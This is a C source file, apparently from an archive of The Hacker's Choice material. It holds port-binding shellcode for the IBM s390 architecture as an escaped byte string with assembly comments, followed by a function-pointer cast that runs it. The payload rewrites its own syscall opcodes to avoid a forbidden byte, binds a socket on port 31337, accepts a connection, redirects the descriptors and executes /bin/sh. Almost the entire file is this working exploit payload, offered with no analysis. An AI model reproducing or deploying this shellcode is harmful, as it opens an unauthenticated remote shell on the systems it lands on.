1 /*----------------------------------------------------------------------*/
2 /* s390 portbinding shellcode - svc opcode 0x0a free */
3 /* code by jcyberpunk@thehackerschoice.com */
4 /*----------------------------------------------------------------------*/
6 "\x0d\x10" /* basr %r1,%r0 */
7 "\x41\x90\x10\xd4" /* la %r9,212(%r1) */
8 "\xa7\x68\x04\x56" /* lhi %r6,1110 */
9 "\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
10 "\x1a\x6a" /* ar %r6,%r10 */
11 "\x42\x60\x10\xd4" /* stc %r6,212(%r1) */
12 "\xa7\x28\x04\x4e" /* lhi %r2,1102 */
13 "\x1a\x2a" /* ar %r2,%r10 */
14 "\x40\x20\xf0\x78" /* sth %r2,120(%r15) */
15 "\xa7\x38\x7a\x69" /* lhi %r3,31337 */
16 "\x40\x30\xf0\x7a" /* sth %r3,122(%r15) */
17 "\x17\x44" /* xr %r4,%r4 */
18 "\x50\x40\xf0\x7c" /* st %r4,124(%r15) */
19 "\xa7\x38\x04\x4d" /* lhi %r3,1101 */
20 "\x1a\x3a" /* ar %r3,%r10 */
21 "\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
22 "\xa7\x28\x04\x4d" /* lhi %r2,1101 */
23 "\x1a\x2a" /* ar %r2,%r10 */
24 "\x41\x30\xf0\x80" /* la %r3,128(%r15) */
25 "\x0d\xe9" /* basr %r14,%r9 */
26 "\x18\x72" /* lr %r7,%r2 */
27 "\x41\x30\xf0\x78" /* la %r3,120(%r15) */
28 "\xa7\x88\x04\x5c" /* lhi %r8,1116 */
29 "\x1a\x8a" /* ar %r8,%r10 */
30 "\x18\x48" /* lr %r4,%r8 */
31 "\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
32 "\xa7\x28\x04\x4e" /* lhi %r2,1102 */
33 "\x1a\x2a" /* ar %r2,%r10 */
34 "\x41\x30\xf0\x80" /* la %r3,128(%r15) */
35 "\x0d\xe9" /* basr %r14,%r9 */
36 "\x18\x27" /* lr %r2,%r7 */
37 "\xa7\x38\x04\x4d" /* lhi %r3,1101 */
38 "\x1a\x3a" /* ar %r3,%r10 */
39 "\x90\x23\xf0\x80" /* stm %r2,%r3,128(%r15) */
40 "\xa7\x28\x04\x50" /* lhi %r2,1104 */
41 "\x1a\x2a" /* ar %r2,%r10 */
42 "\x41\x30\xf0\x80" /* la %r3,128(%r15) */
43 "\x0d\xe9" /* basr %r14,%r9 */
44 "\x18\x27" /* lr %r2,%r7 */
45 "\x41\x30\xf0\x78" /* la %r3,120(%r15) */
46 "\x90\x23\xf0\x80" /* stm %r2,%r3,128(%r15) */
47 "\x50\x80\xf0\x88" /* st %r8,136(%r15) */
48 "\xa7\x28\x04\x51" /* lhi %r2,1105 */
49 "\x1a\x2a" /* ar %r2,%r10 */
50 "\x41\x30\xf0\x80" /* la %r3,128(%r15) */
51 "\x0d\xe9" /* basr %r14,%r9 */
52 "\xa7\x68\x04\x8b" /* lhi %r6,1163 */
53 "\x1a\x6a" /* ar %r6,%r10 */
54 "\x42\x60\x10\xd5" /* stc %r6,213(%r1) */
55 "\xa7\x38\x04\x4e" /* lhi %r3,1102 */
56 "\x1a\x3a" /* ar %r3,%r10 */
57 "\x0d\xe9" /* basr %r14,%r9 */
58 "\xa7\x3a\xff\xff" /* ahi %r3,-1 */
59 "\x0d\xe9" /* basr %r14,%r9 */
60 "\xa7\x3a\xff\xff" /* ahi %r3,-1 */
61 "\x0d\xe9" /* basr %r14,%r9 */
62 "\xa7\x68\x04\x57" /* lhi %r6,1111 */
63 "\x1a\x6a" /* ar %r6,%r10 */
64 "\x42\x60\x10\xd5" /* stc %r6,213(%r1) */
65 "\x41\x20\x10\xd8" /* la %r2,216(%r1) */
66 "\x50\x20\x10\xe0" /* st %r2,224(%r1) */
67 "\x41\x30\x10\xe0" /* la %r3,224(%r1) */
68 "\x17\x44" /* xr %r4,%r4 */
69 "\x42\x40\x10\xdf" /* stc %r4,223(%r1) */
70 "\x50\x40\x10\xe4" /* st %r4,228(%r1) */
71 "\x41\x40\x10\xe4" /* la %r4,228(%r1) */
72 "\x0d\xe9" /* basr %r14,%r9 */
73 "\x0b\x66" /* svc 102 <--- after modification */
74 "\x07\xfe" /* br %r14 */
75 "\x2f\x62\x69\x6e" /* /bin */
76 "\x2f\x73\x68\x5c"; /* /sh\ */
80 void (*z)()=(void*)shellcode;
projects / oweals / thc-archive.git / blob